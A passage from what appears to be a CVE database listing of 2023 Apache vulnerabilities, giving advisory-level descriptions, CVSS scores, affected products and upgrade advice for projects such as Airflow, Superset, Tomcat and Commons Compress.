Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses. This issue affects Apache HTTP Server: through 2.4.58.

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
netapp ontap 9
apple macos *
broadcom fabric_operating_system -
debian debian_linux 10.0
fedoraproject fedora 39
netapp ontap_tools 10
fedoraproject fedora 40
CVE-2023-39196

Improper Authentication vulnerability in Apache Ozone. The vulnerability allows an attacker to download metadata internal to the Storage Container Manager service without proper authentication. The attacker is not allowed to do any modification within the Ozone Storage Container Manager service using this vulnerability. The accessible metadata does not contain sensitive information that can be used to exploit the system later on, and the accessible data does not make it possible to gain access to actual user data within Ozone. This issue affects Apache Ozone: 1.2.0 and subsequent releases up until 1.3.0. Users are recommended to upgrade to version 1.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache ozone *
CVE-2023-39264

By default, stack traces for errors were enabled, which resulted in the exposure of internal traces on REST API endpoints to users. This vulnerability exists in Apache Superset versions up to and including 2.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-39265

Apache Superset would allow for SQLite database connections to be incorrectly registered when an attacker uses alternative driver names like sqlite+pysqlite or by using database imports. This could allow for unexpected file creation on Superset webservers. Additionally, if Apache Superset is using a SQLite database for its metadata (not advised for production use) it could result in more severe vulnerabilities related to confidentiality and integrity. This vulnerability exists in Apache Superset versions up to and including 2.1.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 3.8 LOW CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N 1.2 2.5
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache superset *
CVE-2023-39410

When deserializing untrusted or corrupted data, it is possible for a reader to consume memory beyond the allowed constraints and thus lead to out of memory on the system. This issue affects Java applications using Apache Avro Java SDK up to and including 1.11.2. Users should update to apache-avro version 1.11.3 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2023-39441

Apache Airflow SMTP Provider before 1.3.0, Apache Airflow IMAP Provider before 3.3.0, and Apache Airflow before 2.7.0 are affected by the Validation of OpenSSL Certificate vulnerability. The default SSL context with SSL library did not check a server's X.509 certificate.  Instead, the code accepted any certificate, which could result in the disclosure of mail server credentials or mail contents when the client connects to an attacker in a MITM position. Users are strongly advised to upgrade to Apache Airflow version 2.7.0 or newer, Apache Airflow IMAP Provider version 3.3.0 or newer, and Apache Airflow SMTP Provider version 1.3.0 or newer to mitigate the risk associated with this vulnerability

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-imap *
apache apache-airflow-providers-smtp *
CVE-2023-39456

Improper Input Validation vulnerability in Apache Traffic Server with malformed HTTP/2 frames.This issue affects Apache Traffic Server: from 9.0.0 through 9.2.2. Users are recommended to upgrade to version 9.2.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 37
fedoraproject fedora 38
apache traffic_server *
CVE-2023-39508

Execution with Unnecessary Privileges, : Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow.The "Run Task" feature enables authenticated user to bypass some of the restrictions put in place. It allows to execute code in the webserver context as well as allows to bypas limitation of access the user has to certain DAGs. The "Run Task" feature is considered dangerous and it has been removed entirely in Airflow 2.6.0 This issue affects Apache Airflow: before 2.6.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-39553

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider. Apache Airflow Drill Provider is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection with DrillHook giving an opportunity to read files on the Airflow server. This issue affects Apache Airflow Drill Provider: before 2.4.3. It is recommended to upgrade to a version that is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-drill *
CVE-2023-39913

Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK.This issue affects Apache UIMA Java SDK: before 3.5.0. Users are recommended to upgrade to version 3.5.0, which fixes the issue. There are several locations in the code where serialized Java objects are deserialized without verifying the data. This affects in particular: * the deserialization of a Java-serialized CAS, but also other binary CAS formats that include TSI information using the CasIOUtils class; * the CAS Editor Eclipse plugin which uses the the CasIOUtils class to load data; * the deserialization of a Java-serialized CAS of the Vinci Analysis Engine service which can receive using Java-serialized CAS objects over network connections; * the CasAnnotationViewerApplet and the CasTreeViewerApplet; * the checkpointing feature of the CPE module. Note that the UIMA framework by default does not start any remotely accessible services (i.e. Vinci) that would be vulnerable to this issue. A user or developer would need to make an active choice to start such a service. However, users or developers may use the CasIOUtils in their own applications and services to parse serialized CAS data. They are affected by this issue unless they ensure that the data passed to CasIOUtils is not a serialized Java object. When using Vinci or using CasIOUtils in own services/applications, the unrestricted deserialization of Java-serialized CAS files may allow arbitrary (remote) code execution. As a remedy, it is possible to set up a global or context-specific ObjectInputFilter (cf. https://openjdk.org/jeps/290  and  https://openjdk.org/jeps/415 ) if running UIMA on a Java version that supports it. Note that Java 1.8 does not support the ObjectInputFilter, so there is no remedy when running on this out-of-support platform. An upgrade to a recent Java version is strongly recommended if you need to secure an UIMA version that is affected by this issue. To mitigate the issue on a Java 9+ platform, you can configure a filter pattern through the "jdk.serialFilter" system property using a semicolon as a separator: To allow deserializing Java-serialized binary CASes, add the classes: * org.apache.uima.cas.impl.CASCompleteSerializer * org.apache.uima.cas.impl.CASMgrSerializer * org.apache.uima.cas.impl.CASSerializer * java.lang.String To allow deserializing CPE Checkpoint data, add the following classes (and any custom classes your application uses to store its checkpoints): * org.apache.uima.collection.impl.cpm.CheckpointData * org.apache.uima.util.ProcessTrace * org.apache.uima.util.impl.ProcessTrace_impl * org.apache.uima.collection.base_cpm.SynchPoint Make sure to use "!*" as the final component to the filter pattern to disallow deserialization of any classes not listed in the pattern. Apache UIMA 3.5.0 uses tightly scoped ObjectInputFilters when reading Java-serialized data depending on the type of data being expected. Configuring a global filter is not necessary with this version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache uimaj *
CVE-2023-40037

Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-40195

Deserialization of Untrusted Data, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Software Foundation Apache Airflow Spark Provider. When the Apache Spark provider is installed on an Airflow deployment, an Airflow user that is authorized to configure Spark hooks can effectively run arbitrary code on the Airflow node by pointing it at a malicious Spark server. Prior to version 4.1.3, this was not called out in the documentation explicitly, so it is possible that administrators provided authorizations to configure Spark hooks without taking this into account. We recommend administrators to review their configurations to make sure the authorization to configure Spark hooks is only provided to fully trusted users. To view the warning in the docs please visit  https://airflow.apache.org/docs/apache-airflow-providers-apache-spark/4.1.3/connections/spark.html

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache airflow_spark_provider *
CVE-2023-40272

Apache Airflow Spark Provider, versions before 4.1.3, is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection giving an opportunity to read files on the Airflow server. It is recommended to upgrade to a version that is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-spark *
CVE-2023-40273

The session fixation vulnerability allowed the authenticated user to continue accessing Airflow webserver even after the password of the user has been reset by the admin - up until the expiry of the session of the user. Other than manually cleaning the session database (for database session backend), or changing the secure_key and restarting the webserver, there were no mechanisms to force-logout the user (and all other users with that). With this fix implemented, when using the database session backend, the existing sessions of the user are invalidated when the password of the user is reset. When using the securecookie session backend, the sessions are NOT invalidated and still require changing the secure key and restarting the webserver (and logging out all other users), but the user resetting the password is informed about it with a flash message warning displayed in the UI. Documentation is also updated explaining this behaviour. Users of Apache Airflow are advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-40610

Improper authorization check and possible privilege escalation on Apache Superset up to but excluding 2.1.2. Using the default examples database connection that allows access to both the examples schema and Apache Superset's metadata database, an attacker using a specially crafted CTE SQL statement could change data on the metadata database. This weakness could result on tampering with the authentication/authorization data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N 1.8 4.0
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache superset *
CVE-2023-40611

Apache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. Users should upgrade to version 2.7.1 or later which has removed the vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-40712

Apache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated users who have access to see the task/dag in the UI, to craft a URL, which could lead to unmasking the secret configuration of the task that otherwise would be masked in the UI. Users are strongly advised to upgrade to version 2.7.1 or later which has removed the vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-40743

** UNSUPPORTED WHEN ASSIGNED ** When integrating Apache Axis 1.x in an application, it may not have been obvious that looking up a service through "ServiceFactory.getService" allows potentially dangerous lookup mechanisms such as LDAP. When passing untrusted input to this API method, this could expose the application to DoS, SSRF and even attacks leading to RCE. As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. As a workaround, you may review your code to verify no untrusted or unsanitized input is passed to "ServiceFactory.getService", or by applying the patch from https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210 . The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache axis *
CVE-2023-41080

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. Older, EOL versions may also be affected. The vulnerability is limited to the ROOT (default) web application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2023-41081

Important: Authentication Bypass CVE-2023-41081 The mod_jk component of Apache Tomcat Connectors in some circumstances, such as when a configuration included "JkOptions +ForwardDirectories" but the configuration did not provide explicit mounts for all possible proxied requests, mod_jk would use an implicit mapping and map the request to the first defined worker. Such an implicit mapping could result in the unintended exposure of the status worker and/or bypass security constraints configured in httpd. As of JK 1.2.49, the implicit mapping functionality has been removed and all mappings must now be via explicit configuration. Only mod_jk is affected by this issue. The ISAPI redirector is not affected. This issue affects Apache Tomcat Connectors (mod_jk only): from 1.2.0 through 1.2.48. Users are recommended to upgrade to version 1.2.49, which fixes the issue. History 2023-09-13 Original advisory 2023-09-28 Updated summary

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat_connectors *
CVE-2023-41180

Incorrect certificate validation in InvokeHTTP on Apache NiFi MiNiFi C++ versions 0.13 to 0.14 allows an intermediary to present a forged certificate during TLS handshake negotation. The Disable Peer Verification property of InvokeHTTP was effectively flipped, disabling verification by default, when using HTTPS. Mitigation: Set the Disable Peer Verification property of InvokeHTTP to true when using MiNiFi C++ versions 0.13.0 or 0.14.0. Upgrading to MiNiFi C++ 0.15.0 corrects the default behavior.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache nifi_minifi_c++ *
CVE-2023-41267

In the Apache Airflow HDFS Provider, versions prior to 4.1.1, a documentation info pointed users to an install incorrect pip package. As this package name was unclaimed, in theory, an attacker could claim this package and provide code that would be executed when this package was installed. The Airflow team has since taken ownership of the package (neutralizing the risk), and fixed the doc strings in version 4.1.1

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache airflow_hdfs_provider *
CVE-2023-41313

The authentication method in Apache Doris versions before 2.0.0 was vulnerable to timing attacks. Users are recommended to upgrade to version 2.0.0 + or 1.2.8, which fixes this issue.

Products Affected

Vendor Product Version
apache doris *
CVE-2023-41314

The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H 3.9 4.2

Products Affected

Vendor Product Version
apache doris *
CVE-2023-41752

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Traffic Server.This issue affects Apache Traffic Server: from 8.0.0 through 8.1.8, from 9.0.0 through 9.2.2. Users are recommended to upgrade to version 8.1.9 or 9.2.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 37
fedoraproject fedora 38
apache traffic_server *
CVE-2023-41834

Improper Neutralization of CRLF Sequences in HTTP Headers in Apache Flink Stateful Functions 3.1.0, 3.1.1 and 3.2.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted HTTP requests. Attackers could potentially inject malicious content into the HTTP response that is sent to the user's browser. Users should upgrade to Apache Flink Stateful Functions version 3.3.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache flink_stateful_functions *
CVE-2023-41835

When a Multipart request is performed but some of the fields exceed the maxStringLength  limit, the upload files will remain in struts.multipart.saveDir  even if the request has been denied. Users are recommended to upgrade to versions Struts 2.5.32 or 6.1.2.2 or Struts 6.3.0.1 or greater, which fixe this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache struts *
CVE-2023-41916

In Apache Linkis =1.4.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will trigger arbitrary file reading. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis = 1.4.0 will be affected.  We recommend users upgrade the version of Linkis to version 1.5.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-42501

Unnecessary read permissions within the Gamma role would allow authenticated users to read configured CSS templates and annotations. This issue affects Apache Superset: before 2.1.2. Users should upgrade to version or above 2.1.2 and run `superset init` to reconstruct the Gamma role or remove `can_read` permission from the mentioned resources.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42502

An authenticated attacker with update datasets permission could change a dataset link to an untrusted site by spoofing the HTTP Host header, users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset versions before 3.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42503

Improper Input Validation, Uncontrolled Resource Consumption vulnerability in Apache Commons Compress in TAR parsing.This issue affects Apache Commons Compress: from 1.22 before 1.24.0. Users are recommended to upgrade to version 1.24.0, which fixes the issue. A third party can create a malformed TAR file by manipulating file modification times headers, which when parsed with Apache Commons Compress, will cause a denial of service issue via CPU consumption. In version 1.22 of Apache Commons Compress, support was added for file modification times with higher precision (issue # COMPRESS-612 [1]). The format for the PAX extended headers carrying this data consists of two numbers separated by a period [2], indicating seconds and subsecond precision (for example “1647221103.5998539”). The impacted fields are “atime”, “ctime”, “mtime” and “LIBARCHIVE.creationtime”. No input validation is performed prior to the parsing of header values. Parsing of these numbers uses the BigDecimal [3] class from the JDK which has a publicly known algorithmic complexity issue when doing operations on large numbers, causing denial of service (see issue # JDK-6560193 [4]). A third party can manipulate file time headers in a TAR file by placing a number with a very long fraction (300,000 digits) or a number with exponent notation (such as “9e9999999”) within a file modification time header, and the parsing of files with these headers will take hours instead of seconds, leading to a denial of service via exhaustion of CPU resources. This issue is similar to CVE-2012-2098 [5]. [1]: https://issues.apache.org/jira/browse/COMPRESS-612 [2]: https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_05 [3]: https://docs.oracle.com/javase/8/docs/api/java/math/BigDecimal.html [4]: https://bugs.openjdk.org/browse/JDK-6560193 [5]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098 Only applications using CompressorStreamFactory class (with auto-detection of file types), TarArchiveInputStream and TarFile classes to parse TAR files are impacted. Since this code was introduced in v1.22, only that version and later versions are impacted.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2023-42504

An authenticated malicious user could initiate multiple concurrent requests, each requesting multiple dashboard exports, leading to a possible denial of service. This issue affects Apache Superset: before 3.0.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6
security@apache.org 5.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H 1.3 4.0

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42505

An authenticated user with read permissions on database connections metadata could potentially access sensitive information such as the connection's username. This issue affects Apache Superset before 3.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42663

Apache Airflow, versions before 2.7.2, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. Users of Apache Airflow are advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42780

Apache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors. Users of Apache Airflow are advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42781

Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.  This is a different issue than CVE-2023-42663 but leading to similar outcome. Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42792

Apache Airflow, in versions prior to 2.7.2, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. Users of Apache Airflow are strongly advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42794

Incomplete Cleanup vulnerability in Apache Tomcat. The internal fork of Commons FileUpload packaged with Apache Tomcat 9.0.70 through 9.0.80 and 8.5.85 through 8.5.93 included an unreleased, in progress refactoring that exposed a potential denial of service on Windows if a web application opened a stream for an uploaded file but failed to close the stream. The file would never be deleted from disk creating the possibility of an eventual denial of service due to the disk being full. Other, EOL versions may also be affected. Users are recommended to upgrade to version 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2023-42795

Incomplete Cleanup vulnerability in Apache Tomcat.When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
debian debian_linux 10.0
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2023-43123

On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method File.createTempFile on unix-like systems creates a file with predefined name (so easily identifiable) and by default will create this file with the permissions -rw-r--r--. Thus, if sensitive information is written to this file, other local users can read this information. File.createTempFile(String, String) will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. This affects the class  https://github.com/apache/storm/blob/master/storm-core/src/jvm/org/apache/storm/utils/TopologySpoutLag.java#L99  and was introduced by  https://issues.apache.org/jira/browse/STORM-3123 In practice, this has a very limited impact as this class is used only if ui.disable.spout.lag.monitoring is set to false, but its value is true by default. Moreover, the temporary file gets deleted soon after its creation. The solution is to use  Files.createTempFile https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/nio/file/Files.html#createTempFile(java.lang.String,java.lang.String,java.nio.file.attribute.FileAttribute...)  instead. We recommend that all users upgrade to the latest version of Apache Storm.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

Products Affected

Vendor Product Version
apache storm *
CVE-2023-43622

An attacker, opening a HTTP/2 connection with an initial window size of 0, was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern. This has been fixed in version 2.4.58, so that such connection are terminated properly after the configured connection timeout. This issue affects Apache HTTP Server: from 2.4.55 through 2.4.57. Users are recommended to upgrade to version 2.4.58, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2023-43666

Insufficient Verification of Data Authenticity vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0,  General user can view all user data like Admin account. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/8623

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-43667

